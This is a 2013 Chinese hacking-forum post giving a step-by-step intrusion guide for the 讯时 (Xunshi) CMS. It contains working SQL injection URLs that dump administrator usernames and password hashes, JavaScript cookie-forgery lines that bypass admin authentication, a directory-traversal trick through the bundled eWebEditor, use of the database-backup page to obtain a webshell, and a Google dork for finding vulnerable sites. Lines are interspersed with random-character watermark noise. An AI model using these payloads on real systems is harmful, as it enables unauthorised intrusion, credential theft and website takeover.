找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2675|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘9 h3 G3 W) s: @; C7 f7 r3 p% W

* ~" f  p& D, R6 S1 r在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)" G0 L/ m- N0 j; J" x+ `3 \$ |6 k
9 G6 T( M% u$ f6 Y  X! e3 R
以下本文总结来自黑防去年第9期杂志上的内容...
' S; ^$ D: R% s/ E3 Z
2 \0 ?* r7 V7 y& U先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%& t3 e' r" M9 [0 a( B+ _
! f) c9 R. h/ q/ I) q0 q/ e7 y
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
5 K0 T$ R9 f* F- z0 ]
5 p; m2 c/ @. C' Y3 u- X4 \记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
7 `) ^, q- U- w; _) }这里一个注入' C" z5 P  u' b2 j) E
) v6 i+ P4 V) f
效果如图:# t* U# |# p9 e) c  w7 l& b
  l, \+ m5 V& y

  U/ o- l) ]/ h4 |5 |8 ?+ }6 ^& L. U, O) s' B
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.1 e2 N3 t" L) D2 x

* E) V  i0 n7 S/ j& j- G! O密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去1 k+ n: d1 T+ W4 N: a
# _4 [; T+ F, j3 n( H
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
$ ^  @6 _9 s7 r( p1 M( h
) a8 B5 V8 V5 [那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
9 P2 J$ {9 J( r8 N( E
1 J% `% x% Z" m- p; D9 n8 H% b因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞1 f. a& a* f: U7 a. u! }8 H7 C

9 ~: b( H( u6 d: j- g它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
& r1 l* {1 [8 g% }2 q  k6 d8 d; V( S. O9 N( b& n8 {( C! ^) A1 M
访问这页面来列目录..步骤如下:
) O/ Y. f" C2 P6 `: u. Y
* f" m0 b/ P# w: U( f- xjavascript:alert(document.cookie="admindj=1") , A. @0 K- i* ~, i$ f

0 H5 n+ _1 V7 ~$ f9 O& yhttp://www.political-security.co ... asp?id=46&dir=../... h& j0 s3 }: ]+ f* W7 [* t  a) s9 T

3 Q* J6 K( ~  q6 u3 g, \: I效果如图:
: \* Z7 Q& ^6 U; @2 i; ^1 X
9 L8 a3 Q. c/ `" Q2 K1 Y2 M+ R ; F* d' z: T& g5 j1 g0 b- u6 w
8 s+ E1 N# O9 u1 E- p
这样全站目录都能瞧了..找到后台目录..进去..
# ]0 J* P8 o7 J% p9 @2 w% G; Y; v7 r3 D% y# J& M
那么进了后台怎么拿shell??上传--备份就ok了..0 D4 L8 f; D% j' Y% I
' q+ p2 V5 W' G( r
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的.." K" B2 @7 R: f$ Y4 _
! j* Y& Z" S2 ?
这个我也碰到过一次..你都可以通过列目录来实现..
+ q9 ]9 `6 ~5 H2 H  @) S; r) P9 i5 m) v/ Y8 [
javascript:alert(document.cookie="admindj=1") + ~* l1 X% ?: j& H/ ^# F
3 d5 S- J2 C) h2 `9 ~
http://www.political-security.co ... p?action=BackupData
" d$ u) [6 ?- N& Q! U  X$ D, J; k4 y! U/ V9 p
备份ok..( |! p# z% v  g, n

/ N/ p" C3 _; ?3 ]; F9 U5 _1 |0 H4 C那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
: B9 |& ?( Q: f2 ?3 y
$ K0 ^' q1 s$ ^在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下0 @3 K3 l- Q& G0 @
, T0 O" s7 `' G; z
然后访问此页面进行注入..步骤如下:7 F' x5 @. \' q( J2 x8 A
9 F1 ^; F; _2 z. }! n3 B2 r
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")' o( Q' G6 ]" z
, I: w2 q+ d, h) p& t
然后请求admin/admin_chk.asp页面
5 z/ t$ k! J& H% C% Q1 m6 \0 I0 n6 X# ~3 t, _3 `
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
9 y" ?7 n7 R. R% I
/ ]  M5 g0 ?% n26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
  ?5 x/ [8 y! i! Z
% x" g$ m3 _! i6 Y$ F效果如图所示:
3 c' r; }. m5 \, |" A, [/ R7 ]7 i# f8 M5 f; |$ e* w8 s
6 d4 k: s& o; ]9 K8 s3 |5 J% T
8 {) h, w% J$ [% y- v/ q2 |
讯时漏洞2
! t2 g- j, `7 ^, R" O9 u" zgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
& A0 g; U9 W  y" P 7 x" V, _& T: G4 }4 @
1、/admin/admin_news_pl_view.asp?id=1
: y4 i, b9 F. Q//id任意 填入以下语句
3 o3 r  m" v8 }# l' o . b* _' ]) N' T8 U& N" W
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!# k" O/ A7 }/ ]3 R* l4 A- c% c

( B  H6 m7 }; w1 \
+ q. E4 c; V( J* x5 x0 f, g% h$ t7 N1 n2 G+ O
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
6 p( A1 i- ^3 C. f: p  s" j3 Y; y 5 q( C  f7 r  P, u+ c' x* t+ f; O

. r$ ^) I8 A$ M1 M5 A$ @3 t! R! q+ m6 E# g% X6 R: M
爆出管理员帐号和密码了! |3 m2 y# H& J5 [1 _: J. [# e' l
+ @! D& A+ P( Z+ B5 x: h

, \0 l& ]2 J/ x2 m3 q
2 `2 x; [9 B3 O6 k6 K2 c  U- b7 T5 K4、cookies进后台
2 w  d! h( p% Q. ~1 e, ]$ K 0 R1 W3 g- ?; w$ t
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
! N; @- ?$ _# ^; t& n( y3 q" v  K5 i
2 y5 Y- W7 n: T0 O; J+ k8 t/ K% B2 V8 _

- v% B) Q# i& Q5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
: K) C4 w6 _/ E  Y( y
1 ^5 j# j/ [: a8 F1 W5 a8 h% O

9 o3 z$ m2 z/ E. ^6、后台有上传和备份取SHELL不难。
0 {- w. h* K/ }# s: |; J' k4 W* G , F$ `8 A9 {5 X; _* N
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
3 m1 X4 i1 w6 c+ O* T
% _6 g- K( _: u1 w逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
7 {; D! n8 s$ Q8 D; N. A( a" r, |: S! y* I2 W, K

" d& v) I* Z& ^6 f! q: U; J
1 o' y5 ~# f& l$ m- ^4 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表